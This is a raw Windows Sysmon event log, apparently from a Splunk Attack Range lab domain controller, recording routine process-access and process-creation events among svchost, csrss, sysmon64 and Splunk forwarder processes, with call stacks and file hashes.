13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4510-6000-4701-000000009A01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005385Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005384Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005383Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4510-6000-4701-000000009A01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.408{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4510-6000-4701-000000009A01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.409{08A6967A-4510-6000-4701-000000009A01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.189{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4510-6000-4601-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.173{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4510-6000-4601-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 